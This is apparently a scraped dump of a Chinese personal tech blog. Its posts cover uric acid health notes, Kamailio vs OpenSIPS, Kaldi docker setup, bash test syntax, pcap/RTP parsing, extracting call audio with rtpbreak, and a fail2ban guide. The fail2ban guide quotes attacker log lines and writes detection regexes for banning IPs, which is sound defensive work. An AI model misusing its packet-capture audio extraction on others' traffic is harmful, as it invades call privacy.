将至,尚未而立。\n小孩子爱憎分明,喜欢与不喜欢就直接说,不懂得拐弯抹角。\n成年人放下爱憎,只有生存\n无论如何,你应当体谅别人的世界与你的不同。\n对你来说,很容易理解的问题。可能对别人来说,是难以理解的。\n不要将自己当作干柴,稍微一点,就成烈火。\n当你知道你将要说的话会让别人难堪时,请咽下去吧。\n不要轻易否定一个人的工作价值,每个人都希望自己得到肯定。\n无论是对待陌生人、同事、或者是朋友。\n我们不是刚出生的婴儿,我们有完全发育的下丘脑。\n控制你的体温,同时也控制你的脾气,你说话的方式。\n每个人都值得温柔以待,即使是你不喜欢的人。\n你好,下丘脑~","title":"你好,下丘脑"},{"content":"从细胞说起 人体由细胞组成。人体的细胞中大约有40-60万亿个。细胞无时无刻不在新老更替、新陈代谢。\n微观世界的细胞变化,反映在人体身上,就是一个人从成长到衰老的过程。\n细胞中有一种重要的物质,核酸。核酸是脱氧核糖核酸(DNA)和核糖核酸(RNA)的总称。\n核酸由无数的核苷酸组成,核苷酸里有一种物质叫做嘌呤。而嘌呤和人体的尿酸有着密不可分的关系。\n除了作为遗传物质的一部分,嘌呤中的腺嘌呤也是腺苷三磷酸(ATP)的重要组成部分。ATP是人体直接的能量来源。\n在剧烈运动时,ATP会进一步分解成腺嘌呤。\n总之:尿酸和嘌呤的关系非常密切。人体细胞的遗传物质以及作为能量来源的ATP都会产生嘌呤。\n尿酸来源分类 内源性尿酸: 来自人体自身细胞衰亡,残留的嘌呤经过酶的作用产生尿酸 外源性尿酸: 大多来自食物中的嘌呤类化合物、核酸、核蛋白等物质,经过酶的作用产生尿酸。 我们身体中的尿酸2/3来自自身的生命活动, 1/3来自食物。\n尿酸的合成与排泄 大部分的嘌呤在肝脏中经过氧化代谢、变成尿酸。在此过程中,有两类酶扮演着重要作用。 抑制尿酸合成的酶 促进尿酸合成的酶 2/3的尿酸通过肾脏排出。肾脏中也有能够促进或者抑制尿酸重吸收的酶。 1/3的尿酸通过肠道排出 
所以尿酸较高的患者,医生会让你抽血查肝功能和肾功能,如果肝脏中的某些指标异常,也会通过B超去做进一步的判断。\n很多人误以为尿酸是查尿液,实际上这是被尿酸的名字误解了,尿酸是抽血检测的。\n人体中酶在生命活动中扮演着重要的角色。酶就好像是太极中的阴与阳一样,相互制衡达到平衡之时,身体才会健康。否则阴阳失衡,必然会存在身体病变。\n另外一些降低尿酸的药品,例如苯溴马隆片,其药理也是通过降低肾脏对尿酸的重吸收,来促进尿酸的排泄的。\n食物中的尿酸对人体影响有多大? 具体哪些不能吃,哪些能吃,网上都有很多资料了。总之,大鱼大肉是要尽量避免的。食物主要要以清淡为主,吃饭不要吃撑,尽量吃到7分饱,或者吃到不饿为佳。\n高尿酸的危害 有溶解度相关知识的同学都会知道,溶质在溶液中都是有溶解度的,超过溶解度之后,物质就会析出。尿酸也是如此,过饱和的尿酸会析出称为尿酸结晶。\n这些结晶会沉积在关节和各种软组织,就可能造成这些部位的损害。\n当尿酸结晶附着在关节软骨表面上的滑膜上时,血液中的白细胞会把它当做敌人,释放各种酶去进攻。这些酶在进攻敌人的同时,也会造成自身关节软骨的溶解和软组织的损伤。 对痛风患者而言,感受到的就是苦不堪言的痛风性关节炎。\n另外,大量的尿酸最终是通过肾脏排泄的,如果尿酸在肾脏上析出,对肾脏也会造成难以修复的损害,甚至患上尿毒症。光听这个尿毒症的名字,你就应该知道,这个病有多厉害。当你管不住自己嘴的时候,想想尿毒症吧。\n不要等到失去任劳任怨的肾脏之后,再后悔莫及。\n参考 https://baike.baidu.com/item/%E4%BA%BA%E4%BD%93%E7%BB%86%E8%83%9E ","permalink":"https://wdd.js.org/posts/2020/05/teadt5/","summary":"从细胞说起 人体由细胞组成。人体的细胞中大约有40-60万亿个。细胞无时无刻不在新老更替、新陈代谢。\n微观世界的细胞变化,反映在人体身上,就是一个人从成长到衰老的过程。\n细胞中有一种重要的物质,核酸。核酸是脱氧核糖核酸(DNA)和核糖核酸(RNA)的总称。\n核酸由无数的核苷酸组成,核苷酸里有一种物质叫做嘌呤。而嘌呤和人体的尿酸有着密不可分的关系。\n除了作为遗传物质的一部分,嘌呤中的腺嘌呤也是腺苷三磷酸(ATP)的重要组成部分。ATP是人体直接的能量来源。\n在剧烈运动时,ATP会进一步分解成腺嘌呤。\n总之:尿酸和嘌呤的关系非常密切。人体细胞的遗传物质以及作为能量来源的ATP都会产生嘌呤。\n尿酸来源分类 内源性尿酸: 来自人体自身细胞衰亡,残留的嘌呤经过酶的作用产生尿酸 外源性尿酸: 大多来自食物中的嘌呤类化合物、核酸、核蛋白等物质,经过酶的作用产生尿酸。 我们身体中的尿酸2/3来自自身的生命活动, 1/3来自食物。\n尿酸的合成与排泄 大部分的嘌呤在肝脏中经过氧化代谢、变成尿酸。在此过程中,有两类酶扮演着重要作用。 抑制尿酸合成的酶 促进尿酸合成的酶 2/3的尿酸通过肾脏排出。肾脏中也有能够促进或者抑制尿酸重吸收的酶。 1/3的尿酸通过肠道排出 所以尿酸较高的患者,医生会让你抽血查肝功能和肾功能,如果肝脏中的某些指标异常,也会通过B超去做进一步的判断。\n很多人误以为尿酸是查尿液,实际上这是被尿酸的名字误解了,尿酸是抽血检测的。\n人体中酶在生命活动中扮演着重要的角色。酶就好像是太极中的阴与阳一样,相互制衡达到平衡之时,身体才会健康。否则阴阳失衡,必然会存在身体病变。\n另外一些降低尿酸的药品,例如苯溴马隆片,其药理也是通过降低肾脏对尿酸的重吸收,来促进尿酸的排泄的。\n食物中的尿酸对人体影响有多大? 
具体哪些不能吃,哪些能吃,网上都有很多资料了。总之,大鱼大肉是要尽量避免的。食物主要要以清淡为主,吃饭不要吃撑,尽量吃到7分饱,或者吃到不饿为佳。\n高尿酸的危害 有溶解度相关知识的同学都会知道,溶质在溶液中都是有溶解度的,超过溶解度之后,物质就会析出。尿酸也是如此,过饱和的尿酸会析出称为尿酸结晶。\n这些结晶会沉积在关节和各种软组织,就可能造成这些部位的损害。\n当尿酸结晶附着在关节软骨表面上的滑膜上时,血液中的白细胞会把它当做敌人,释放各种酶去进攻。这些酶在进攻敌人的同时,也会造成自身关节软骨的溶解和软组织的损伤。 对痛风患者而言,感受到的就是苦不堪言的痛风性关节炎。\n另外,大量的尿酸最终是通过肾脏排泄的,如果尿酸在肾脏上析出,对肾脏也会造成难以修复的损害,甚至患上尿毒症。光听这个尿毒症的名字,你就应该知道,这个病有多厉害。当你管不住自己嘴的时候,想想尿毒症吧。\n不要等到失去任劳任怨的肾脏之后,再后悔莫及。\n参考 https://baike.baidu.com/item/%E4%BA%BA%E4%BD%93%E7%BB%86%E8%83%9E ","title":"尿酸简史"},{"content":"之前我写过OpenSIPS的文章,所以在学习Kamailio时,会尝试和OpenSIPS做对比。\n从下图可以看出,Kamailio和Opensips算是同根同源了。很多语法、伪变量、模块使用方式,两者都极为相似。\n不一样的点 然而总体来说,kamailio相比OpenSIPS,更加灵活。 如果有机会,尝试下kamailio也未尝不可。而且kamailio的git star数量比OpenSIPS多很多,而且issue也比OpenSIPS少。\nKamailio 有wiki社区,注册之后,可以来编辑文档,相比于OpenSIPS只有官方文档,kamailio显得更容易让人亲近,提高了用户的参与度。 脚本上 kamailio支持三种不同的注释风格,opensips只支持一种 kamailio支持类似c语言的宏定义的方式写脚本,因而kamailio的脚本可以在不借助外部工具的情况下,写得非常灵活。可以参考 https://www.kamailio.org/wiki/cookbooks/5.5.x/core 的define部分 代码质量上 我觉得kamailio也更胜一筹,至少kamailio还做了c的单元测试 总体而言,如果你是第一次来选择,我更希望你用kamailio作为sip服务器。我之所以用OpenSIPS只不过是路径依赖而已。\n但是如果你学会了OpenSIPS, 那你学习kamailio就会非常轻松。\n参考
https://weekly-geekly.github.io/articles/150280/index.html https://github.com/kamailio/kamailio https://www.kamailio.org/wiki/ ","title":"另一个功能强大的sip server: kamailio"},{"content":"为了省去安装的麻烦,我直接使用的是容器版本的kaldi\nhttps://hub.docker.com/r/kaldiasr/kaldi\ndocker pull kaldiasr/kaldi This is the official Docker Hub of the Kaldi project: http://kaldi-asr.org Kaldi offers two sets of images: CPU-based images and GPU-based images. Daily builds of the latest version of the master branch (both CPU and GPU images) are pushed to DockerHub. Sample usage of the CPU based images: docker run -it kaldiasr/kaldi:latest Sample usage of the GPU based images: Note: use nvidia-docker to run the GPU images. docker run -it --runtime=nvidia kaldiasr/kaldi:gpu-latest Please refer to Kaldi\u0026#39;s GitHub repository for more details. kaldiasr/kaldi这个镜像是基于linuxkit构建的,如果缺少什么包,可以使用apt命令在容器中安装\n安装oymyzsh 因为我比较喜欢用ohmyzsh, 所以即使在容器里,我也想安装这个工具\napt install zsh curl ","permalink":"https://wdd.js.org/posts/2020/05/haowe5/","summary":"为了省去安装的麻烦,我直接使用的是容器版本的kaldi\nhttps://hub.docker.com/r/kaldiasr/kaldi\ndocker pull kaldiasr/kaldi This is the official Docker Hub of the Kaldi project: http://kaldi-asr.org Kaldi offers two sets of images: CPU-based images and GPU-based images. Daily builds of the latest version of the master branch (both CPU and GPU images) are pushed to DockerHub. 
Sample usage of the CPU based images: docker run -it kaldiasr/kaldi:latest Sample usage of the GPU based images: Note: use nvidia-docker to run the GPU images.","title":"kaldi安装"},{"content":"let timer:NodeJS.Timer; timer = global.setTimeout(myFunction, 1000); 参考http://evanshortiss.com/development/nodejs/typescript/2016/11/16/timers-in-typescript.html\n","permalink":"https://wdd.js.org/posts/2020/05/uwe59t/","summary":"let timer:NodeJS.Timer; timer = global.setTimeout(myFunction, 1000); 参考http://evanshortiss.com/development/nodejs/typescript/2016/11/16/timers-in-typescript.html","title":"Type 'Timeout' is not assignable to type 'number'"},{"content":"sudo killall -HUP mDNSResponder ","permalink":"https://wdd.js.org/posts/2020/05/gy02f8/","summary":"sudo killall -HUP mDNSResponder ","title":"macbook 清空DNS缓存"},{"content":"if # if if condition; then commands; fi # if else if if condition; then commands; elif condition; then commands; else commands; fi 简单版本的 if 测试\n[ condtion ] \u0026amp;\u0026amp; action; [ conditio ] || action; 算数比较 [ $var -eq 0 ] #当var等于0 [ $var -ne 0 ] #当var不等于0 -gt 大于 -lt 小于 -ge 大于或等于 -le 小于或等于 使用-a, -o 可以组合复杂的测试。\n[ $var -ne 0 -a $var -gt 2 ] # -a相当于并且 [ $var -ne 0 -o $var -gt 2 ] # -o相当于或 文件比较 [ -f $file ] # 如果file是存在的文件路径或者文件名,则返回真 -f 测试文件路径或者文件是否存在 -x 测试文件是否可执行 -e 测试文件是否存在 -c 测试文件是否是字符设备 -b 测试文件是否是块设备 -w 测试文件是否可写 -r 测试文件是否可读 -L 测试文件是否是一个符号链接 字符串比较 字符串比较一定要用双中括号。\n[[ $str1 == $str2 ]] # 测试字符串是否相等 [[ $str1 != $str2 ]] # 测试字符串是否不相等 [[ $str1 \u0026gt; $str2 ]] # 测试str1字符序号比str2大 [[ $str1 \u0026lt; $str2 ]] # 测试str1字符序号比str2小 [[ -z $str ]] # 测试str是否是空字符串 [[ -n $str ]] # 测试str是否是非空字符串 if 和[之间必须包含有一个空格 # ok if [[ $1 == $2 ]]; then echo hello fi # error if[[ $1 == $2 ]]; then echo hello fi ","permalink":"https://wdd.js.org/shell/cond-test/","summary":"if # if if condition; then commands; fi # if else if if condition; then commands; elif condition; then commands; else commands; fi 简单版本的 if 测试\n[ condtion ] \u0026amp;\u0026amp; action; [ conditio ] || 
action; 算数比较 [ $var -eq 0 ] #当var等于0 [ $var -ne 0 ] #当var不等于0 -gt 大于 -lt 小于 -ge 大于或等于 -le 小于或等于 使用-a, -o 可以组合复杂的测试。\n[ $var -ne 0 -a $var -gt 2 ] # -a相当于并且 [ $var -ne 0 -o $var -gt 2 ] # -o相当于或 文件比较 [ -f $file ] # 如果file是存在的文件路径或者文件名,则返回真 -f 测试文件路径或者文件是否存在 -x 测试文件是否可执行 -e 测试文件是否存在 -c 测试文件是否是字符设备 -b 测试文件是否是块设备 -w 测试文件是否可写 -r 测试文件是否可读 -L 测试文件是否是一个符号链接 字符串比较 字符串比较一定要用双中括号。","title":"比较与测试"},{"content":"","permalink":"https://wdd.js.org/posts/2020/05/db6ou6/","summary":"","title":"xmpp学习"},{"content":"介绍 之所以要写这篇文章,是因为我要从pcap格式的抓包文件中抽取出语音文件。之前虽然对tcp协议有不错的理解,但并没有写代码去真正的解包分析。\n最近用Node.js尝试去pcap文件中成功提取出了语音文件。在此做个总结。\n预备知识 字节序: 关于字节序,可以参考 https://www.ruanyifeng.com/blog/2016/11/byte-order.html。读取的时候,如果字节序设置错了,就会读出来一堆无法解析的内容 PCAP格式 下面是pcap文件的格式。\n文件开头是一个全局头。后续跟着一系列的包头和包体。\nGlobal Header格式 全局头由六个字段组成,加起来一共24个字节。\ntypedef struct pcap_hdr_s { guint32 magic_number; /* magic number */ guint16 version_major; /* major version number */ guint16 version_minor; /* minor version number */ gint32 thiszone; /* GMT to local correction */ guint32 sigfigs; /* accuracy of timestamps */ guint32 snaplen; /* max length of captured packets, in octets */ guint32 network; /* data link type */ } pcap_hdr_t; magic_number 魔术字符,32位无符号整型,一般是0xa1b2c3d4或者0xd4c3b2a1,前者表示字段要按照大端字节序来读取,后者表示字段要按照小端字节序来读取。 version_major 大版本号,16位无符号整型。一般是2 version_minor 小版本号,16位无符号整型。一般是4 thiszone 时区 sigfigs 时间戳精度 snaplen 捕获的最大的长度 network 数据链路层的类型。参考http://www.tcpdump.org/linktypes.html, 常见的1就是表示IEEE 802.3 Packet Header 当读取了pcap文件的前24个字节之后,紧接着需要读取16个字节。这16个字节中,incl_len表示packet数据部分的长度。当拿到了Packet Data部分数据的长度,我们同时也就知道了下一个packet header要从哪个位置开始读取。\ntypedef struct pcaprec_hdr_s { guint32 ts_sec; /* timestamp seconds */ guint32 ts_usec; /* timestamp microseconds */ guint32 incl_len; /* number of octets of packet saved in file */ guint32 orig_len; /* actual length of packet */ } pcaprec_hdr_t; Packet Data packet data部分是链路层的数据,由global header的network类型去决定,一般可能是802.3的比较多。\nIEEE 802.3 当拿到packet 
data部分的数据之后。参考frame的格式。一般Preamble字段部分是没有的。所以我们可以把包的总长度减去14字节之后,拿到User Data部分的数据。\n其中Type/Length部分可以说明上层运载的是什么协议的包,比较常见的是0x0800表示上层是IPv4, 0x86dd表示上层是IPv6\n0 - 1500 length field (IEEE 802.3 and/or 802.2) 0x0800 IP(v4), Internet Protocol version 4 0x0806 ARP, Address Resolution Protocol 0x8137 IPX, Internet Packet eXchange (Novell) 0x86dd IPv6, Internet Protocol version 6 802.3的详情可以参考 https://wiki.wireshark.org/Ethernet?action=show\u0026amp;redirect=Protocols%2Feth\nIP包的封装格式 如何计算IP数据部分的长度呢?需要知道两个字段的值。\nTotal Length: IP数据报的总长度,单位是字节 IHL: IP数据报头部的总长度,单位是4字节。IHL比较常见的值是5,则说明IP数据头部的长度是20字节。IHL占4位,最大是15,所以IP头的最大长度是60字节(15 * 4) data部分的字节长度 = Total Length - IHL * 4\nTCP包的封装格式 UDP包的封装格式 UDP包的头部是定长的8个字节。数据部分的长度 = 总长度 - 8\nRTP包的封装格式 RTP包的数据部分长度 = 总长度 - 12\nPT部分表示编码格式,例如常见的PCMU是0。\nRTP详情 https://www.ietf.org/rfc/rfc3550.txt\nRTP数据体类型编码表参考 https://www.ietf.org/rfc/rfc3551.txt\n参考 http://www.tcpdump.org/linktypes.html https://wiki.wireshark.org/Development/LibpcapFileFormat ","permalink":"https://wdd.js.org/network/gzskun/","summary":"介绍 之所以要写这篇文章,是因为我要从pcap格式的抓包文件中抽取出语音文件。之前虽然对tcp协议有不错的理解,但并没有写代码去真正的解包分析。\n最近用Node.js尝试去pcap文件中成功提取出了语音文件。在此做个总结。\n预备知识 字节序: 关于字节序,可以参考 https://www.ruanyifeng.com/blog/2016/11/byte-order.html。读取的时候,如果字节序设置错了,就会读出来一堆无法解析的内容 PCAP格式 下面是pcap文件的格式。\n文件开头是一个全局头。后续跟着一系列的包头和包体。\nGlobal Header格式 全局头由六个字段组成,加起来一共24个字节。\ntypedef struct pcap_hdr_s { guint32 magic_number; /* magic number */ guint16 version_major; /* major version number */ guint16 version_minor; /* minor version number */ gint32 thiszone; /* GMT to local correction */ guint32 sigfigs; /* accuracy of timestamps */ guint32 snaplen; /* max length of captured packets, in octets */ guint32 network; /* data link type */ } pcap_hdr_t; magic_number 魔术字符,32位无符号整型,一般是0xa1b2c3d4或者0xd4c3b2a1,前者表示字段要按照大端字节序来读取,后者表示字段要按照小端字节序来读取。 version_major 大版本号,16位无符号整型。一般是2 version_minor 小版本号,16位无符号整型。一般是4 thiszone 时区 sigfigs 时间戳精度 snaplen 捕获的最大的长度 network 
数据链路层的类型。参考http://www.","title":"网络拆包笔记"},{"content":"wireshark具有这个功能,但是并不适合做批量执行。\n下面的方案比较适合批量执行。\n# 1. 安装依赖 yum install gcc libpcap-devel libnet-devel sox -y # 2. 克隆源码 git clone https://github.com/wangduanduan/rtpsplit.git # 3. 切换目录 cd rtpsplit # 4. 编译可执行文件 make # 5. 将可执行文件复制到/usr/local/bin目录下 cp src/rtpbreak /usr/local/bin # 6. 切换到录音文件的目录,假如当前目录只有一个文件 rtpbreak -r krk9hprvin1u1laqe14g-8beffe8aaeb9bf99.pcap -g -m -d ./ audio git:(edge) ✗ rtpbreak -r krk9hprvin1u1laqe14g-8beffe8aaeb9bf99.pcap -g -m -d ./ + rtpbreak v1.3a running here! + pid: 1885, date/time: 01/05/2020#09:49:05 + Configuration + INPUT Packet source: rxfile \u0026#39;krk9hprvin1u1laqe14g-8beffe8aaeb9bf99.pcap\u0026#39; Force datalink header length: disabled + OUTPUT Output directory: \u0026#39;./\u0026#39; RTP raw dumps: enabled RTP pcap dumps: enabled Fill gaps: enabled Dump noise: disabled Logfile: \u0026#39;.//rtp.0.txt\u0026#39; Logging to stdout: enabled Logging to syslog: disabled Be verbose: disabled + SELECT Sniff packets in promisc mode: enabled Add pcap filter: disabled Expecting even destination UDP port: disabled Expecting unprivileged source/destination UDP ports: disabled Expecting RTP payload type: any Expecting RTP payload length: any Packet timeout: 10.00 seconds Pattern timeout: 0.25 seconds Pattern packets: 5 + EXECUTION Running as user/group: root/root Running daemonized: disabled * You can dump stats sending me a SIGUSR2 signal * Reading packets... open di .//rtp.0.0.txt ! [rtp0] detected: pt=0(g711U) 192.168.40.192:26396 =\u0026gt; 192.168.60.229:20000 open di .//rtp.0.1.txt ! [rtp1] detected: pt=0(g711U) 10.197.169.10:49265 =\u0026gt; 192.168.60.229:20012 * eof reached. -- Caught SIGTERM signal (15), cleaning up... 
-- * [rtp1] closed: packets inbuffer=0 flushed=285 lost=0(0.00%), call_length=0m12s * [rtp0] closed: packets inbuffer=0 flushed=586 lost=0(0.00%), call_length=0m12s + Status Alive RTP Sessions: 0 Closed RTP Sessions: 2 Detected RTP Sessions: 2 Flushed RTP packets: 871 Lost RTP packets: 0 (0.00%) Noise (false positive) packets: 8 + No active RTP streams # 7. 查看输出文件 -rw-r--r--. 1 root root 185K May 1 09:22 krk9hprvin1u1laqe14g-8beffe8aaeb9bf99.pcap -rw-r--r--. 1 root root 132K May 1 09:49 rtp.0.0.pcap -rw-r--r--. 1 root root 92K May 1 09:49 rtp.0.0.raw -rw-r--r--. 1 root root 412 May 1 09:49 rtp.0.0.txt -rw-r--r--. 1 root root 52K May 1 09:49 rtp.0.1.pcap -rw-r--r--. 1 root root 33K May 1 09:49 rtp.0.1.raw -rw-r--r--. 1 root root 435 May 1 09:49 rtp.0.1.txt -rw-r--r--. 1 root root 1.7K May 1 09:49 rtp.0.txt # 8. 使用sox 转码以及合成wav文件 sox -r8000 -c1 -t ul rtp.0.0.raw -t wav 0.wav sox -r8000 -c1 -t ul rtp.0.1.raw -t wav 1.wav sox -m 0.wav 1.wav call.wav # 最终合成的 call.wav文件,就是可以放到浏览器中播放的双声道语音文件 参考 rtpbreak帮助文档 Copyright (c) 2007-2008 Dallachiesa Michele \u0026lt;micheleDOTdallachiesaATposteDOTit\u0026gt; rtpbreak v1.3a is free software, covered by the GNU General Public License. USAGE: rtpbreak (-r|-i) \u0026lt;source\u0026gt; [options] INPUT -r \u0026lt;str\u0026gt; Read packets from pcap file \u0026lt;str\u0026gt; -i \u0026lt;str\u0026gt; Read packets from network interface \u0026lt;str\u0026gt; -L \u0026lt;int\u0026gt; Force datalink header length == \u0026lt;int\u0026gt; bytes OUTPUT -d \u0026lt;str\u0026gt; Set output directory to \u0026lt;str\u0026gt; (def:.) 
-w Disable RTP raw dumps -W Disable RTP pcap dumps -g Fill gaps in RTP raw dumps (caused by lost packets) -n Dump noise packets -f Disable stdout logging -F Enable syslog logging -v Be verbose SELECT -m Sniff packets in promisc mode -p \u0026lt;str\u0026gt; Add pcap filter \u0026lt;str\u0026gt; -e Expect even destination UDP port -u Expect unprivileged source/destination UDP ports (\u0026gt;1024) -y \u0026lt;int\u0026gt; Expect RTP payload type == \u0026lt;int\u0026gt; -l \u0026lt;int\u0026gt; Expect RTP payload length == \u0026lt;int\u0026gt; bytes -t \u0026lt;float\u0026gt; Set packet timeout to \u0026lt;float\u0026gt; seconds (def:10.00) -T \u0026lt;float\u0026gt; Set pattern timeout to \u0026lt;float\u0026gt; seconds (def:0.25) -P \u0026lt;int\u0026gt; Set pattern packets count to \u0026lt;int\u0026gt; (def:5) EXECUTION -Z \u0026lt;str\u0026gt; Run as user \u0026lt;str\u0026gt; -D Run in background (option -f implicit) MISC -k List known RTP payload types -h This ","permalink":"https://wdd.js.org/posts/2020/05/fosfbg/","summary":"wireshark具有这个功能,但是并不适合做批量执行。\n下面的方案比较适合批量执行。\n# 1. 安装依赖 yum install gcc libpcap-devel libnet-devel sox -y # 2. 克隆源码 git clone https://github.com/wangduanduan/rtpsplit.git # 3. 切换目录 cd rtpsplit # 4. 编译可执行文件 make # 5. 将可执行文件复制到/usr/local/bin目录下 cp src/rtpbreak /usr/local/bin # 6. 切换到录音文件的目录,假如当前目录只有一个文件 rtpbreak -r krk9hprvin1u1laqe14g-8beffe8aaeb9bf99.pcap -g -m -d ./ audio git:(edge) ✗ rtpbreak -r krk9hprvin1u1laqe14g-8beffe8aaeb9bf99.pcap -g -m -d ./ + rtpbreak v1.3a running here! 
+ pid: 1885, date/time: 01/05/2020#09:49:05 + Configuration + INPUT Packet source: rxfile \u0026#39;krk9hprvin1u1laqe14g-8beffe8aaeb9bf99.","title":"从pcap文件提取转wav语音文件"},{"content":"娱乐至死,娱乐也能让人变得智障。\n贪图于精神愉悦,在永无休止的欢悦中难以自拔。\n道德经上写道:五色令人目盲,五音令人耳聋,五味令人口爽,驰骋田猎令人心发狂。\n现代人尤其如此。买分辨率最高的显示器,刷新频率最高的手机,买最贵的耳机,吃口味最为劲爆的火锅。\n感觉人都已经被五官所控制,变成了一个行尸走肉的躯壳。\n但是话又说回来,人为什么要这样麻痹自己呢?\n或许变成一个智障,才能从现实的夹缝中稍微缓口气。\n冷风如刀,以大地为砧板,视众生皆为鱼肉。\n","permalink":"https://wdd.js.org/posts/2020/04/uffptn/","summary":"娱乐至死,娱乐也能让人变得智障。\n贪图于精神愉悦,在永无休止的欢悦中难以自拔。\n道德经上写道:五色令人目盲,五音令人耳聋,五味令人口爽,驰骋田猎令人心发狂。\n现代人尤其如此。买分辨率最高的显示器,刷新频率最高的手机,买最贵的耳机,吃口味最为劲爆的火锅。\n感觉人都已经被五官所控制,变成了一个行尸走肉的躯壳。\n但是话又说回来,人为什么要这样麻痹自己呢?\n或许变成一个智障,才能从现实的夹缝中稍微缓口气。\n冷风如刀,以大地为砧板,视众生皆为鱼肉。","title":"娱乐智障"},{"content":"简介 如果你的主机在公网上有端口暴露出去,那么总会有一些不怀好意的家伙,会尝试通过各种方式攻击你的机器。常见的服务例如ssh, nginx都会有类似的威胁。\n手工将某个ip加入黑名单,这种操作太麻烦,而且效率低。而fail2ban就是一种自动化的解决方案。\nfail2ban工作原理 fail2ban的工作原理是监控某个日志文件,然后根据某些关键词,提取出攻击方的IP地址,然后将其加入到黑名单。\nfail2ban安装 yum install fail2ban -y # 如果找不到fail2ban包,就执行下面的命令 yum install epel-release # 安装fail2ban 完成后 systemctl enable fail2ban # 设置fail2ban开机启动 systemctl start fail2ban # 启动fail2ban systemctl status fail2ban # 查看fail2ban的运行状态 用fail2ban保护ssh fail2ban的配置文件位于/etc/fail2ban目录下。\n在该目录下建立一个文件 jail.local, 内容如下\nbantime 持续禁止多久 maxretry 最大多少次尝试 banaction 拦截后的操作 findtime 查找时间 下面这段配置的意思是:监控sshd服务的最近10分钟的日志,如果某个ip在10分钟之内,有2次登录失败,就把这个ip加入黑名单, 24小时之后,这个ip才会被从黑名单中移除。\n[DEFAULT] bantime = 24h banaction = iptables-multiport maxretry = 2 findtime = 10m [sshd] enabled = true 然后重启fail2ban, systemctl restart fail2ban fail2ban提供管理工具fail2ban-client\n**fail2ban-client status **显示fail2ban的状态 **fail2ban-client status sshd **显示某个监狱的配置。从下面的输出可以看出,fail2ban已经拦截了一些IP地址了 \u0026gt; fail2ban-client status Status |- Number of jail:\t1 `- Jail list:\tsshd \u0026gt; fail2ban-client status sshd Status for the jail: sshd |- Filter | |- Currently failed:\t2 | |- Total failed:\t23289 | `- Journal matches:\t_SYSTEMD_UNIT=sshd.service + _COMM=sshd `- Actions |- Currently
banned:\t9 |- Total banned:\t1270 `- Banned IP list:\t93.174.93.10 165.22.238.92 23.231.25.234 134.255.219.207 77.202.192.113 120.224.47.86 144.91.70.139 90.3.194.84 217.182.89.87 fail2ban保护sshd的原理 fail2ban的配置文件目录下有个filter.d目录,该目录下有个sshd.conf的文件,这个文件就是对于sshd日志的过滤规则,里面有些正则,是用来提取出恶意家伙的IP地址。\n配置文件很长,我们只看其中一段, 其中**\u0026lt;****HOST\u0026gt;**是个非常重要的关键词,是用来提取出远程的IP地址的。\ncmnfailre = ^[aA]uthentication (?:failure|error|failed) for \u0026lt;F-USER\u0026gt;.*\u0026lt;/F-USER\u0026gt; from \u0026lt;HOST\u0026gt;( via \\S+)?%(__suff)s$ ^User not known to the underlying authentication module for \u0026lt;F-USER\u0026gt;.*\u0026lt;/F-USER\u0026gt; from \u0026lt;HOST\u0026gt;%(__suff)s$ ^Failed publickey for invalid user \u0026lt;F-USER\u0026gt;(?P\u0026lt;cond_user\u0026gt;\\S+)|(?:(?! from ).)*?\u0026lt;/F-USER\u0026gt; from \u0026lt;HOST\u0026gt;%(__on_port_opt)s(?: ssh\\d*)?(?(cond_us 实战:如何自定义一个过滤规则 我的nginx服务器,几乎每隔2-3秒就会收到下面的一个请求。\n下面我就写个过滤规则,将类似请求的IP加入黑名单。\n165.22.225.238 - - [28/Apr/2020:08:19:38 +0800] \u0026#34;POST /ws/v1/cluster/apps/new-application HTTP/1.1\u0026#34; 502 11 \u0026#34;-\u0026#34; \u0026#34;python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-957.27.2.el7.x86_64\u0026#34; \u0026#34;-\u0026#34; 165.22.225.238 - - [28/Apr/2020:08:22:48 +0800] \u0026#34;POST /ws/v1/cluster/apps/new-application HTTP/1.1\u0026#34; 502 11 \u0026#34;-\u0026#34; \u0026#34;python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-957.27.2.el7.x86_64\u0026#34; \u0026#34;-\u0026#34; 165.22.225.238 - - [28/Apr/2020:08:24:08 +0800] \u0026#34;POST /ws/v1/cluster/apps/new-application HTTP/1.1\u0026#34; 502 11 \u0026#34;-\u0026#34; \u0026#34;python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-957.27.2.el7.x86_64\u0026#34; \u0026#34;-\u0026#34; 165.22.225.238 - - [28/Apr/2020:08:25:45 +0800] \u0026#34;POST /ws/v1/cluster/apps/new-application HTTP/1.1\u0026#34; 502 11 \u0026#34;-\u0026#34; \u0026#34;python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-957.27.2.el7.x86_64\u0026#34; \u0026#34;-\u0026#34;
165.22.225.238 - - [28/Apr/2020:08:28:01 +0800] \u0026#34;POST /ws/v1/cluster/apps/new-application HTTP/1.1\u0026#34; 502 11 \u0026#34;-\u0026#34; \u0026#34;python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-957.27.2.el7.x86_64\u0026#34; \u0026#34;-\u0026#34; step1: 分析日志规则 165.22.225.238 - - [28/Apr/2020:08:19:38 +0800] \u0026#34;POST /ws/v1/cluster/apps/new-application HTTP/1.1\u0026#34; 502 11 \u0026#34;-\u0026#34; \u0026#34;python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-957.27.2.el7.x86_64\u0026#34; \u0026#34;-\u0026#34; HOST - - .*\u0026#34; 502 .* step2: 写规则文件 在filter.d目录下新建文件 banit.conf\n[INCLUDES] [Definition] failregex = \u0026lt;HOST\u0026gt; - - .*\u0026#34; 502 .* ignoreregex = step3: 修改jail.local [DEFAULT] bantime = 24h banaction = iptables-multiport maxretry = 2 findtime = 10m [sshd] enabled = true [banit] enabled = true action = iptables-allports[name=banit, protocol=all] logpath = /var/log/nginx/access.log step4: 重启fail2ban fail2ban-client restart**\nstep5: 查看效果 可以看出banit的这个监狱,已经加入了一个165.22.225.238这个ip,这个流氓不会再骚扰我们的主机了。\n\u0026gt; fail2ban fail2ban-client status banit Status for the jail: banit |- Filter | |- Currently failed:\t1 | |- Total failed:\t5 | `- File list:\t/var/log/nginx/access.log `- Actions |- Currently banned:\t1 |- Total banned:\t1 `- Banned IP list:\t165.22.225.238 **\nfail2ban-client 常用操作 重启: **fail2ban systemctl restart fail2ban ** 查看fail2ban opensips运行状态: **fail2ban-client status opensips ** 黑名单操作 (注意,黑名单测试时,不要把自己的IP加到黑名单里做测试,否则就连不上机器了) IP加入黑名单:**fail2ban-client set opensips banip 192.168.1.8 ** 